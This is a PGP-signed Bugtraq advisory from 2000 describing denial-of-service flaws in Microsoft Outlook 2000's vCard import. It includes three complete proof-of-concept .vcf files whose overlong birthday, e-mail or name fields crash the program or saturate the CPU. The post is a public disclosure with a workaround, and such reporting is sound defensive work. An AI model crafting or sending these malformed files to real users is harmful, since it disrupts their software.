Bugtraq mailing list archives
vCard DoS on Outlook 2000
From: joelmoses () MINDSPRING COM
Date: Thu, 31 Aug 2000 11:51:20 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Vulnerability in vCard import in Outlook 2000 Released: August 30, 2000 Summary ======= Under certain conditions, excessively long or malformed fields in a vCard (.vcf) file can cause Microsoft Outlook 2000 to either overflow or excessively utilize system resources. Background ========== The specifications regarding vCard MIME types and field contents can be found in RFCs 2425 and 2426. Although RFC 2426 section 2.6 specifically requires lines longer than 75 characters to be folded as defined in [MIME-DIR], it appears Outlook does not support line folding, and will attempt to import any field in the file as one value, even if it is several pages long or (in one case) overflows a data field within Outlook. The effect this unlimited import attempt has on Outlook 2000 varies between field types. Some fields will cause Outlook to consume nearly all CPU time, and certain others (especially date/revision fields and e-mail fields) will cause Outlook to terminiate immediately due to an overflow. Severity ======== Outlook 2000 does not attempt to open and import a .vcf file that a user receives via e-mail without prompting the user first. However, vCard files are extremely common, and many users have trained themselves to ignore the warning dialog box. Outlook does, however, open a vCard file with no questions asked if the user saves it to a directory and double-clicks it from Windows Explorer. In this situation, the vCard is processed directly with no warning or status messages displayed to the user. Affected Configurations ======================= Microsoft Outlook 2000 was the only platform tested (on Windows NT 4.0 Workstation, Service Pack 6a+hotfixes). Affected fields in vCard file causing an overflow: - - email: - - bday; value=date (as low as 52 characters of form YYYY-MM-D(60) Affected fields in vCard file causing excessive CPU utilization: - - name: - - nickname: - - fn: - - title: - - title;language=de;value=text: - - tel: - - tel;<label>: - - tel;<label>,<label>: Fields which do not appear to be affected: - - note: Fields which do not appear to be supported: - - any fields which continue on the next line or have defined newlines per RFC-2425 - - key: - - o: No other fields were tested. Examples ======== The following examples will cause the advertised behavior. 1) A modification of the "bday" field to extend beyond 55 characters. This example appears to be the smallest amount of text required to elicit the symptom. This example will cause Outlook 2000 to overflow and terminate. BEGIN:VCARD VERSION:2.1 N:Berger;Meister FN:Meister Berger NICKNAME:Sadf ORG:Test;e3425454 TITLE:Burgermeister NOTE:The Mayor of the great city of Goerlitz in the great country of Germany. TEL;WORK;VOICE:(873) 323-3213 TEL;HOME;VOICE:(873) 323-3213 TEL;CELL;VOICE:(873) 323-3213 TEL;VOICE:+49 3581 1234 TEL;WORK;FAX:(873) 323-3213 ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423 efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State= s of America URL: URL:http://bin.false/ ROLE:sadf BDAY:19630915130848273492749723947923749273942394792734972394729374927 4982739472937492873 EMAIL;PREF;INTERNET:mb () goerlitz de REV:20000830T191121Z END:VCARD 2) A modification of the "e-mail" field with a large amount of text data masquerading as an e-mail address. This example will cause Outlook 2000 to overflow and terminate. BEGIN:VCARD VERSION:2.1 N:Berger;Meister FN:Meister Berger NICKNAME:Sadf ORG:Test;e3425454 TITLE:Burgermeister NOTE:The Mayor of the great city of Goerlitz in the great country of Germany. TEL;WORK;VOICE:(873) 323-3213 TEL;HOME;VOICE:(873) 323-3213 TEL;CELL;VOICE:(873) 323-3213 TEL;VOICE:+49 3581 1234 TEL;WORK;FAX:(873) 323-3213 ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423 efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State= s of America URL: URL:http://bin.false/ ROLE:sadf BDAY:19630915 EMAIL;PREF;INTERNET:mb () goerlitz de sadsack nothing doing is an.overflo .possible.sadsack.not hing.doing.is.an.overflow.possible. <content clipped for brevity - envision lots of text here> .sadsack.nothing.doing.is.an.overflow.possible.com REV:20000830T191121Z END:VCARD 3) A modification of the "N" or "name" field with a large amount of text will not cause Outlook to terminate, but will increase Outlook's CPU utilization to 99%. BEGIN:VCARD VERSION:2.1 N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger Meister <content clipped for brevity - envision lots of text here> Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger MeisterBerger Meister FN:Meister Berger NICKNAME:Sadf ORG:Test;e3425454 TITLE:Burgermeister NOTE:The Mayor of the great city of Goerlitz in the great country of Germany. TEL;WORK;VOICE:(873) 323-3213 TEL;HOME;VOICE:(873) 323-3213 TEL;CELL;VOICE:(873) 323-3213 TEL;VOICE:+49 3581 1234 TEL;WORK;FAX:(873) 323-3213 ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United States of America LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423 efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State= s of America URL: URL:http://bin.false/ ROLE:sadf BDAY:19630915 EMAIL;PREF;INTERNET:mb () goerlitz de REV:20000830T191121Z END:VCARD Resolution ========== None at present, other than to disassociate the .vcf extension from Outlook. There may be more fields affected -- these are merely the initially tested ones. -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.5.1 iQA/AwUBOa1u3MZCl66UabcJEQJADgCfUY+6ZlnpsRevurebbD/M1XrlMfIAn1TO LSZIBp6xoMPl4Tc5unZeICka =N+p4 -----END PGP SIGNATURE-----
Current thread:
- vCard DoS on Outlook 2000 joelmoses (Aug 31)